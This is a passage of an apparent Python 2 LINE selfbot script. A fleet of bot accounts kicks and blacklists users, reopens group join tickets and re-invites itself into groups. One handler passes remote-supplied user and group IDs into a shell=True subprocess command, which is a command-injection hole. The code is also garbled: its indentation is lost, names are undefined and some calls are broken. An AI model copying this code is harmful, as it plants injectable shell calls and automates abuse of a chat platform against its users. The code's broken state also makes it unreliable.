r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), random.randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
    with open(path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#-------------------------------------------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・ " + Name + datetime.today().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・ " + Name
wait2['setTime'][op.param1] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
pass
except:
pass
#-------------------NOTIFIED_READ_MESSAGE----------------
if op.type == 55:
try:
group_id = op.param1
user_id=op.param2
subprocess.Popen('echo "'+ user_id+'|'+str(op.createdTime)+'" >> dataSeen/%s.txt' % group_id, shell=True, stdout=subprocess.PIPE, )
except Exception as e:
print e
#------------------------------------------
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
G = None
for bot in KAC:
    try:
        G = bot.getGroup(op.param1)
        break
    except:
        continue
if G is not None:
    G.name = wait['pro_name'][op.param1]
    for bot in KAC:
        try:
            bot.updateGroup(G)
            break
        except:
            continue
if op.param2 in Bots: # whitelist assumed; the original referenced an undefined name 'ken'
pass
else:
for bot in (ki, kk, kc, ks, kt):
    try:
        bot.kickoutFromGroup(op.param1, [op.param2])
        break
    except:
        continue
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
#=====================================================================================
if op.param3 in mid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
#======================================================
if op.param3 in Bmid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
G = kc.getGroup(op.param1)
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
G = kt.getGroup(op.param1)
G.preventJoinByTicket = False
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
#=========================================================================
#===========================================
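# op.type 32 appears to fire when a group invitation is cancelled. Note that
# "not op.param2 in Bots and admin" only tests that the admin list is
# non-empty; it does not check op.param2 against the admin list.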
if op.type == 32:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki.cancelGroupInvitation(op.param1, matched_list)
if Bmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kk.cancelGroupInvitation(op.param1, matched_list)
if Cmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("^^",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kc.cancelGroupInvitation(op.param1, matched_list)
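# op.type 17: a member joined the group. Blacklisted users are kicked on
# sight and an optional welcome message is sent to everyone else.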
if op.type == 17:
if op.param3 in wait["blacklist"]:
if not op.param2 in Bots and admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
cl.sendText(op.param1,"blacklist users are not allowed to sign in -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param3}
cl.sendMessage(c)
if op.type == 17:
if wait["welcomemsg"] == True:
if op.param2 not in Bots:
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + wait["welmsg"]+ str(ginfo.name))
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
cl.sendText(op.param1,"please do not open link group-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
kicker.kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1,"you are prohibited from inviting-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 15:
if op.param2 in admin:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
if op.type == 19:
if op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
if op.type == 19:
if not op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots and admin:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
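# op.type 19: one of the bot accounts was kicked. A surviving account kicks
# the attacker back, reopens the group ticket so all accounts can rejoin,
# locks the ticket again, and blacklists the attacker unless whitelisted.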
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kk.getGroup(op.param1)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kd.getGroup(op.param1)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kf.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ke.getGroup(op.param1)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ticket = ke.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#========================================================================
if Fmid in op.param3:
if op.param2 in Bots and admin:
pass
try:
kg.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kg.getGroup(op.param1)
X.preventJoinByTicket = False
kg.updateGroup(X)
Ti = kg.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kf.getGroup(op.param1)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
kh.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kh.getGroup(op.param1)
X.preventJoinByTicket = False
kh.updateGroup(X)
Ti = kh.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kg.getGroup(op.param1)
X.preventJoinByTicket = True
kg.updateGroup(X)
Ticket = kg.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
kj.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kj.getGroup(op.param1)
X.preventJoinByTicket = False
kj.updateGroup(X)
Ti = kj.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kh.getGroup(op.param1)
X.preventJoinByTicket = True
kh.updateGroup(X)
Ticket = kh.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kj.getGroup(op.param1)
X.preventJoinByTicket = True
kj.updateGroup(X)
Ticket = kj.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ko.getGroup(op.param1)
G.preventJoinByTicket = False
ko.updateGroup(G)
Ti = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
